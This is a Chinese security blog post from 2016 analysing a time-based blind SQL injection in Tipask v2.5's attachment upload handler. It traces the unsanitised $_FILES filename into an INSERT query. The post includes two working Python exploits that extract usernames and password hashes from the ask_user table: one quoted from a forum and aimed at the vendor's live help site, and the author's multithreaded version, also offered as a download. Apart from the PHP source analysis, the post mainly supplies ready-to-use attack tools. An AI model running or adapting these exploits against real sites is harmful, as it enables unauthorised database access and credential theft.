tipask注入漏洞分析(附exp)


May 20 2016

tipask注入漏洞分析(附exp)

首页 » 原创作品 » tipask注入漏洞分析(附exp)   

tipask注入漏洞分析
ps 几百年没写文章了。有点生疏 各位看客 凑合看下吧。
前几天在52py看到tipask注入利用工具
http://www.52py.org/forum.php?mod=viewthread&tid=1268
以下是lcy帅哥写的exp
#encoding=utf-8
#tipask注入利用
import requests
#目标站
url = "http://help.tipask.com"
length = 0
user = ""
while True:
    length =  length + 1
    l = "(select if(length((select concat(username,0x3a,password) from ask_user limit 1)) = %s,sleep(3),0))" % length
    try:
        data = {'upfile': ("1','.php',1,"+ l +',2,1)#.txt', "1111111111111")}
        r = requests.post(url + "/?attach/upload",files=data,timeout=3)
        print length,
    except:
        break
print "\n[+]length:",length
payloads='abcdefghijklmnopqrstuvwxyz0123456789.:,#@'
for i in range(1,length + 1):
    for payload in list(payloads):
        try:
            sqls = "(select if(ord(mid((select concat(username,0x3a,password) from ask_user limit 1),%s,1))=%s,sleep(2),0))" % (i,ord(payload))
            data = {'upfile': ("1','.php',1,"+ sqls +',2,1)#.txt', "1111111111111")}
            r = requests.post(url + "/?attach/upload",files=data,timeout=2)
            print ".",
        except:
                user += payload
                print '\n[+]',user
                break
print user

源码下载分析吧 源码下载地址:
http://www.tipask.com/download/Tipask_v2.5_UTF8_20140606.zip
安装后 运行exp看下呗

135012rqzmcxy9itx69id7.jpg

 

 

延时注入是不怎么准确 还是要多试用几次啦。反正现在证明exp可以使用。那就可以进行深入的分析咯。
开启mysql 查询日志记录。

 

log-error="c:/mysql_error.log"
log="c:/mysql.log"


sb01.jpg

 

INSERT INTO ask_attach(time,filename,filetype,filesize,location,isimage,uid)  VALUES (1463550857,'1','.php',1,(select if(length((select concat(username,0x3a,password) from ask_user limit 1)) = 4,sleep(3),0)),2,1)#.txt','.txt','13','data/attach/1605/kB4OKwJO.txt',0,0)
 
attach.class.php
<?php

!defined('IN_TIPASK') && exit('Access Denied');

class attachmodel {

    var $db;
    var $base;

    function attachmodel(&$base) {
        $this->base = $base;
        $this->db = $base->db;
    }


    function movetmpfile($attach,$targetfile) {
        forcemkdir(dirname($targetfile));
        if(copy($attach['tmp_name'],$targetfile) || move_uploaded_file($attach['tmp_name'],$targetfile)) {
            return 1;
        }
        if( is_readable($attach['tmp_name'])) {
            $fp = fopen($attach['tmp_name'], 'rb');
            flock($fp, 2);
            $attachedfile = fread($fp, $attach['size']);
            fclose($fp);
            $fp = fopen($targetfile, 'wb');
            flock($fp,2);
            if(fwrite($fp, $attachedfile)) {
                unlink($attach['tmp_name']);
            }
            fclose($fp);
            return 1;
        }
        return 0;
    }


    function add($filename,$ftype,$fsize,$location,$isimage=1) {
        $uid=$this->base->user['uid'];
        $this->db->query("INSERT INTO ".DB_TABLEPRE."attach(time,filename,filetype,filesize,location,isimage,uid)  VALUES ({$this->base->time},'$filename','$ftype','$fsize','$location',$isimage,$uid)");
        return $this->db->insert_id();
    }



}
?>
跟踪 add 函数     attach.php
<?php

!defined('IN_TIPASK') && exit('Access Denied');

class attachcontrol extends base {

    function attachcontrol(& $get, & $post) {
        $this->base($get, $post);
        $this->load('attach');
    }

    function onupload() {
        //上传配置
        $config = array(
            "uploadPath" => "data/attach/", //保存路径
            "fileType" => array(".rar", ".doc", ".docx", ".zip", ".pdf", ".txt", ".swf", ".wmv", "xsl"), //文件允许格式
            "fileSize" => 10 //文件大小限制,单位MB
        );

//文件上传状态,当成功时返回SUCCESS,其余值将直接返回对应字符窜
        $state = "SUCCESS";
        $clientFile = $_FILES["upfile"];
        if (!isset($clientFile)) {
            echo "{'state':'文件大小超出服务器配置!','url':'null','fileType':'null'}"; //请修改php.ini中的upload_max_filesize和post_max_size
            exit;
        }

//格式验证
        $current_type = strtolower(strrchr($clientFile["name"], '.'));
        if (!in_array($current_type, $config['fileType'])) {
            $state = "不支持的文件类型!";
        }
//大小验证
        $file_size = 1024 * 1024 * $config['fileSize'];
        if ($clientFile["size"] > $file_size) {
            $state = "文件大小超出限制!";
        }
//保存文件
        if ($state == "SUCCESS") {
            $targetfile = $config['uploadPath'] . gmdate('ym', $this->time) . '/' . random(8) . strrchr($clientFile["name"], '.');
            $result = $_ENV['attach']->movetmpfile($clientFile, $targetfile);
            if (!$result) {
                $state = "文件保存失败!";
            } else {
                $_ENV['attach']->add($clientFile["name"], $current_type, $clientFile["size"], $targetfile, 0);
            }
        }
//向浏览器返回数据json数据
        echo '{"state":"' . $state . '","url":"' . $targetfile . '","fileType":"' . $current_type . '","original":"' . $clientFile["name"] . '"}';
    }

    function onuploadimage() {
        //上传配置
        $config = array(
            "uploadPath" => "data/attach/", //保存路径
            "fileType" => array(".gif", ".png", ".jpg", ".jpeg", ".bmp"),
            "fileSize" => 2048
        );
        //原始文件名,表单名固定,不可配置
        $oriName = htmlspecialchars($this->post['fileName'], ENT_QUOTES);

        //上传图片框中的描述表单名称,
        $title = htmlspecialchars($this->post['pictitle'], ENT_QUOTES);

        //文件句柄
        $file = $_FILES["upfile"];

        //文件上传状态,当成功时返回SUCCESS,其余值将直接返回对应字符窜并显示在图片预览框,同时可以在前端页面通过回调函数获取对应字符窜
        $state = "SUCCESS";
        //格式验证
        $current_type = strtolower(strrchr($file["name"], '.'));
        if (!in_array($current_type, $config['fileType'])) {
            $state = $current_type;
        }
        //大小验证
        $file_size = 1024 * $config['fileSize'];
        if ($file["size"] > $file_size) {
            $state = "b";
        }
        //保存图片
        if ($state == "SUCCESS") {
            $targetfile = $config['uploadPath'] . gmdate('ym', $this->time) . '/' . random(8) . strrchr($file["name"], '.');
            $result = $_ENV['attach']->movetmpfile($file, $targetfile);
            if (!$result) {
                $state = "c";
            } else {
                $_ENV['attach']->add($file["name"], $current_type, $file["size"], $targetfile);
            }
        }
        echo "{'url':'" . $targetfile . "','title':'" . $title . "','original':'" . $oriName . "','state':'" . $state . "'}";
    }

}

?>
全局没有对$_FILES 变量 进行过滤。 tipask.class.php
 
 function init_request() {
        if (!file_exists(TIPASK_ROOT . '/data/install.lock')) {
            header('location:install/index.php');
            exit();
        }
        require TIPASK_ROOT . '/config.php';
        header('Content-type: text/html; charset=' . TIPASK_CHARSET);
        $querystring = isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '';
        $pos = strrpos($querystring, '.');
        if ($pos !== false) {
            $querystring = substr($querystring, 0, $pos);
        }
        /* 处理简短url */
        $pos = strpos($querystring, '-');
        ($pos !== false) && $querystring = urlmap($querystring);
        $andpos = strpos($querystring, "&");
        $andpos && $querystring = substr($querystring, 0, $andpos);
        $this->get = explode('/', $querystring);
        if (empty($this->get[0])) {
            $this->get[0] = 'index';
        }
        if (empty($this->get[1])) {
            $this->get[1] = 'default';
        }
        if (count($this->get) < 2) {
            exit(' Access Denied !');
        }
        unset($GLOBALS, $_ENV, $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_SERVER_VARS, $HTTP_ENV_VARS);

        $this->get = taddslashes($this->get, 1);
        $this->post = taddslashes(array_merge($_GET, $_POST));
        checkattack($this->post, 'post');
        checkattack($this->get, 'get');
        unset($_POST);
    }

 

global.func.php
taddslashes

function taddslashes($string, $force = 0) {
    if (!MAGIC_QUOTES_GPC || $force) {
        if (is_array($string)) {
            foreach ($string as $key => $val) {
                $string[$key] = taddslashes($val, $force);
            }
        } else {
            $string = addslashes($string);
        }
    }
    return $string;
}

伪造一个上传表单 抓包提交 构造测试payload 延时十秒。

sb02.jpg

 

分析完了  我也写个exp呗 只是对上面exp做了点修改 多线程

 

#-*- coding: utf-8 -*-
import requests
import threading
import Queue
import sys, os
queue=Queue.Queue()

def getlength(url):
    i=0
    while True:
        try:
            i=i+1
            sql="moon',(select if(length((select concat(username,0x3a,password) from ask_user limit 1)) = %s,sleep(10),0)),'60','moon',0,0)#.txt" % i
            data = {'upfile': (sql, "sb")}
            r=requests.post(url=url+"/?attach/upload",files=data,timeout=4) 
            print i,
        except:
            break
        
    print "\n[+]length:%d" % i
    return i



class mythread(threading.Thread):
    def __init__(self,queue,url):
        threading.Thread.__init__(self)
        self.queue=queue
        self.url=url
        
        
    
    
    def run(self):
        password=""
        while True:
            inj=self.queue.get()
            try:
            
            
                payloads='abcdefghijklmnopqrstuvwxyz0123456789.:,#@'
                for payload in list(payloads):
                    sqls = "moon',(select if(ord(mid((select concat(username,0x3a,password) from ask_user limit 1),%d,1))=%s,sleep(6),0)),'60','moon',0,0)#.txt" % (inj,ord(payload))
                    data = {'upfile': (sqls, "sb")}
                    r=requests.post(url=sys.argv[1]+"/?attach/upload",files=data,timeout=6) 
            except:
                print payload,
                password+=payload
                
            
            print '\n[+]',password
            self.queue.task_done()
        print '\n[+]',password









if __name__ == "__main__":
    
    if len(sys.argv) < 2:
         print 'python mytipask.py http://www.moonsec.com/'
         sys.exit()
    else:
        moon=getlength(sys.argv[1])

 
for i in range(1):
    scan = mythread(queue,sys.argv[1])
    scan.setDaemon(True)
    scan.start()


for j in range(1,moon):
    queue.put(j)
    
queue.join()
print "\n[+]End" sb03.jpg

 

 

 网盘分享
链接:http://pan.baidu.com/s/1cI9lSU 密码:nisj

 

如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签: tipask注入漏洞 tipask漏洞 tipaskoday

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «PageAdmin CMS最新版SQL注入(官方DEMO测试) | Codeigniter 利用加密Key(密钥)的对象注入漏洞»

你肿么看?

你还可以输入 250/250 个字

 微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

这篇文章还没有收到评论,赶紧来抢沙发吧~